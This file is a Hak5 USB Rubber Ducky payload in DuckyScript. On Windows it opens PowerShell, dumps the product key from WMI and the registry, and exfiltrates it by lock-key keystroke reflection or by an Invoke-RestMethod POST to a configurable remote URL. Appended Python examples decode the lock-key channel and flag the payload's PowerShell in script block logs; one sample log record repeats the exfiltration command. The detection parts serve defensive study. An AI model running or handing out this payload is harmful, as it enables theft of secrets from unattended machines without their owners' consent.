hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM This small PowerShell payload dumps the Windows license key, which can be stored in the BIOS and/or in the registry.

REM Extension made by Korben for checking if Target is Windows OS
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

REM Wait (at most #MAX_WAIT * #CHECK_INTERVAL ms) until the host has answered the lock-LED request
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM A host that issued more than #WINDOWS_HOST_REQUEST_COUNT configuration requests during enumeration is treated as Windows
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

REM Extension made by 0i41E to signal the end of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0i41E

REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM

REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
REM Blink Caps Lock and leave it in its original (off) state before disabling the HID interface
IF ($_CAPSLOCK_ON == FALSE) THEN
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE
REM Caps Lock was already on: three presses blink it and leave it off
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION

REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0i41E

REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5's original Method.

TARGET:
Windows hosts that support PowerShell and SendKeys

USAGE:
Type out your command or script with PowerShell, but don't execute it yet (so just type it out with STRING); afterwards put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the command's/script's output, write it into a variable and then exfiltrate it.

Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM

FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values: 8 toggles per character, MSB first, NUMLOCK for a 1 bit and CAPSLOCK for a 0 bit
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION

REM If set to TRUE, keys will be sent via PowerShell's Invoke-RestMethod
DEFINE #REMOTE_EXFIL FALSE
REM Define the remote host to which the keys shall be sent. (Only when REMOTE_EXFIL is set to TRUE!)
DEFINE #URL https://example.com/

REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRINGLN powershell -nop -noni
DELAY 1000
STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
DELAY 300
REM Dumping License key when saved in BIOS
STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
REM Dumping License key via registry
STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
REM Executing Get_License
STRING ;IeX $Get_License

REM If REMOTE_EXFIL is set to TRUE, exfiltrate keys to remote host
IF_DEFINED_TRUE #REMOTE_EXFIL
DELAY 500
REM Setting the output as variable & sending it to defined remote host
STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
DELAY 150
Detect_Finished()
ELSE_DEFINED
REM Exfiltrating License key via Keystroke Reflection
Windows_Fileless_HID_Exfil()
DELAY 150
Detect_Finished()
END_IF_DEFINED
REM If System is not Windows...
ELSE
ATTACKMODE STORAGE
END_IF
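The Keystroke Reflection channel in WINDOWS_FILELESS_HID_EXFIL encodes every byte of the captured output as eight NUMLOCK/CAPSLOCK toggles (MSB first, NUMLOCK = 1) and closes with SCROLLLOCK. The Python below is an added example, not part of the Hak5 payload: given a lock-key toggle trace exported from the host (a constructed sample here), it reconstructs what was leaked for incident-response purposes and flags the toggle burst that separates this channel from ordinary typing. The trace format, the 30 ms spacing and the burst thresholds are assumptions.

```python
from typing import List, Tuple

NUMLOCK, CAPSLOCK, SCROLLLOCK = "NUMLOCK", "CAPSLOCK", "SCROLLLOCK"
Event = Tuple[int, str]  # (timestamp in ms, lock key toggled); assumed trace format


def constructed_events(pattern: str, step_ms: int = 30) -> List[Event]:
    """Expand a hand-written pattern (N=NUMLOCK, C=CAPSLOCK, S=SCROLLLOCK,
    spaces ignored) into timestamped events. Constructed test data only."""
    names = {"N": NUMLOCK, "C": CAPSLOCK, "S": SCROLLLOCK}
    return [(i * step_ms, names[ch]) for i, ch in enumerate(pattern.replace(" ", ""))]


def decode_lock_keys(events: List[Event]) -> Tuple[str, int]:
    """Rebuild the text carried by a lock-key toggle stream using the payload's
    scheme: 8 toggles per byte, MSB first, NUMLOCK = 1, CAPSLOCK = 0, SCROLLLOCK
    ends the transfer. Returns (text, leftover_bits); leftover_bits > 0 means
    the capture stopped in the middle of a byte."""
    out = bytearray()
    acc, nbits = 0, 0
    for _, key in events:
        if key == SCROLLLOCK:
            break
        acc = (acc << 1) | (1 if key == NUMLOCK else 0)
        nbits += 1
        if nbits == 8:
            out.append(acc)
            acc, nbits = 0, 0
    return out.decode("ascii", errors="replace"), nbits


def lock_key_burst(events: List[Event], window_ms: int = 1000, threshold: int = 16) -> bool:
    """True if any window_ms span holds at least threshold toggles. A person rarely
    toggles lock keys more than a few times a minute, while this channel emits
    8 toggles per exfiltrated character. Both numbers are assumptions to tune."""
    times = [t for t, _ in events]
    start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window_ms:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


# 'O' (0x4F) and 'K' (0x4B) followed by the SCROLLLOCK terminator, hand-encoded.
SAMPLE_TRACE = constructed_events("CNCCNNNN CNCCNCNN S")

if __name__ == "__main__":
    text, leftover = decode_lock_keys(SAMPLE_TRACE)
    print(f"recovered={text!r} leftover_bits={leftover} burst={lock_key_burst(SAMPLE_TRACE)}")
```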
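Every PowerShell stage of the payload above is typed into an interactive console, so its text lands in script block logging (Event ID 4104) on the host. The Python below is an added example, not from the Hak5 repository: it applies rules built from indicators visible in the payload (the license-key WMI/registry query, SendKeys lock-key toggles, and posting Out-String output with Invoke-RestMethod) to constructed 4104-style records. The record field names and the placeholder URL are assumptions.

```python
import re
from typing import Dict, List

# Each rule lists regexes that must ALL match (case-insensitively) in one script block.
# The indicators are taken from the payload text above.
RULES: Dict[str, List[str]] = {
    "license_key_query": [
        r"SoftwareLicensingService|SoftwareProtectionPlatform",
        r"OA3xOriginalProductKey|BackupProductKeyDefault",
    ],
    "lock_key_keystroke_reflection": [
        r"SendKeys\]::SendWait",
        r"\{(NUMLOCK|CAPSLOCK|SCROLLLOCK)\}",
    ],
    "captured_output_posted_remotely": [
        r"Out-String",
        r"Invoke-RestMethod|Invoke-WebRequest",
        r"-Method\s+Post",
    ],
}


def match_rules(script_block: str) -> List[str]:
    """Names of every rule whose patterns all occur in the block. Case-insensitive,
    so mixed-case spellings such as 'IeX' or 'Invoke-Restmethod' do not evade it."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, script_block, re.IGNORECASE) for p in pats)]


def triage(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the 4104-style records that hit a rule, with the rule names.
    Field names (RecordId, ScriptBlockText) are assumed from the event's data."""
    alerts = []
    for rec in records:
        hits = match_rules(rec.get("ScriptBlockText", ""))
        if hits:
            alerts.append({"RecordId": rec["RecordId"], "Rules": hits})
    return alerts


# Constructed sample records: one benign command, then what the payload's stages log.
SAMPLE_RECORDS = [
    {"RecordId": "1", "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
    {"RecordId": "2", "ScriptBlockText": "$Get_License = \"(Get-WmiObject -query "
     "'select * from SoftwareLicensingService').OA3xOriginalProductKey;\";IeX $Get_License"},
    {"RecordId": "3", "ScriptBlockText": "Add-Type -A System.Windows.Forms;"
     "[System.Windows.Forms.SendKeys]::SendWait('%{NUMLOCK}%{CAPSLOCK}%{SCROLLLOCK}');exit"},
    {"RecordId": "4", "ScriptBlockText": "|Out-String|Set-Variable -Name 'DD';Invoke-Restmethod "
     "-UseBasicParsing -Method Post -Uri 'https://placeholder.invalid/' -Body $DD;exit"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```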